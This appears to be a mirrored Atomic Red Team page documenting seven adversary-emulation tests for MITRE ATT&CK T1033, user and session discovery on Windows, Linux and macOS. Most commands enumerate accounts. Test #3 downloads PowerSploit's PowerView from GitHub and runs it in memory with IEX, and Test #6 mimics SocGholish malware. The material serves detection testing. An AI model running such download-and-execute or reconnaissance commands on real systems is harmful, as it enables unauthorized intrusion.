security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1033/T1033.md
T
Atomic Red Team doc generator 5ede8f21e4 Generated docs from job=generate-docs branch=master [ci skip]
2025-02-13 22:03:40 +00:00

290 lines
7.6 KiB
Markdown
Raw Permalink Blame History

# T1033 - System Owner/User Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1033)
<blockquote>
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - System Owner/User Discovery](#atomic-test-1---system-owneruser-discovery)
- [Atomic Test #2 - System Owner/User Discovery](#atomic-test-2---system-owneruser-discovery)
- [Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)](#atomic-test-3---find-computers-where-user-has-session---stealth-mode-powerview)
- [Atomic Test #4 - User Discovery With Env Vars PowerShell Script](#atomic-test-4---user-discovery-with-env-vars-powershell-script)
- [Atomic Test #5 - GetCurrent User with PowerShell Script](#atomic-test-5---getcurrent-user-with-powershell-script)
- [Atomic Test #6 - System Discovery - SocGholish whoami](#atomic-test-6---system-discovery---socgholish-whoami)
- [Atomic Test #7 - System Owner/User Discovery Using Command Prompt](#atomic-test-7---system-owneruser-discovery-using-command-prompt)
<br/>
## Atomic Test #1 - System Owner/User Discovery
Identify System owner or users on an endpoint.
Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout.
Additionally, two files will be written to disk - computers.txt and usernames.txt.
**Supported Platforms:** Windows
**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | localhost|
#### Attack Commands: Run with `command_prompt`!
```cmd
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
```
<br/>
<br/>
## Atomic Test #2 - System Owner/User Discovery
Identify System owner or users on an endpoint
Upon successful execution, sh will stdout list of usernames.
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c
#### Attack Commands: Run with `sh`!
```sh
users
w
who
```
<br/>
<br/>
## Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)
Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
```
<br/>
<br/>
## Atomic Test #4 - User Discovery With Env Vars PowerShell Script
Use the PowerShell environment variables to identify the current logged user.
**Supported Platforms:** Windows
**auto_generated_guid:** dcb6cdee-1fb0-4087-8bf8-88cfd136ba51
#### Attack Commands: Run with `powershell`!
```powershell
[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
```
#### Cleanup Commands:
```powershell
Remove-Item -Path .\CurrentactiveUser.txt -Force
```
<br/>
<br/>
## Atomic Test #5 - GetCurrent User with PowerShell Script
Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.
**Supported Platforms:** Windows
**auto_generated_guid:** 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
#### Attack Commands: Run with `powershell`!
```powershell
[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
```
#### Cleanup Commands:
```powershell
Remove-Item -Path .\CurrentUserObject.txt -Force
```
<br/>
<br/>
## Atomic Test #6 - System Discovery - SocGholish whoami
SocGholish performs whoami discovery commands and outputs the results to a tmp file.
The test will generate a filename similar to the random one generated during execution and write the file to AppData\Temp.
Reference: https://redcanary.com/threat-detection-report/threats/socgholish/
**Supported Platforms:** Windows
**auto_generated_guid:** 3d257a03-eb80-41c5-b744-bb37ac7f65c7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_path | Location of output file | string | $env:temp|
#### Attack Commands: Run with `powershell`!
```powershell
$TokenSet = @{
U = [Char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
N = [Char[]]'0123456789'
}
$Upper = Get-Random -Count 5 -InputObject $TokenSet.U
$Number = Get-Random -Count 5 -InputObject $TokenSet.N
$StringSet = $Upper + $Number
$rad = (Get-Random -Count 5 -InputObject $StringSet) -join ''
$file = "rad" + $rad + ".tmp"
whoami.exe /all >> #{output_path}\$file
```
#### Cleanup Commands:
```powershell
Remove-Item -Path #{output_path}\rad*.tmp -Force
```
<br/>
<br/>
## Atomic Test #7 - System Owner/User Discovery Using Command Prompt
Identify the system owner or current user using native Windows command prompt utilities.
**Supported Platforms:** Windows
**auto_generated_guid:** ba38e193-37a6-4c41-b214-61b33277fe36
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file_path | Location of output file. | string | $env:temp|
#### Attack Commands: Run with `command_prompt`!
```cmd
set file=#{output_file_path}\user_info_%random%.tmp
echo Username: %USERNAME% > %file%
echo User Domain: %USERDOMAIN% >> %file%
net users >> %file%
query user >> %file%
```
#### Cleanup Commands:
```cmd
del #{output_file_path}\\user_info_*.tmp
```
<br/>
Reference in New Issue View Git Blame Copy Permalink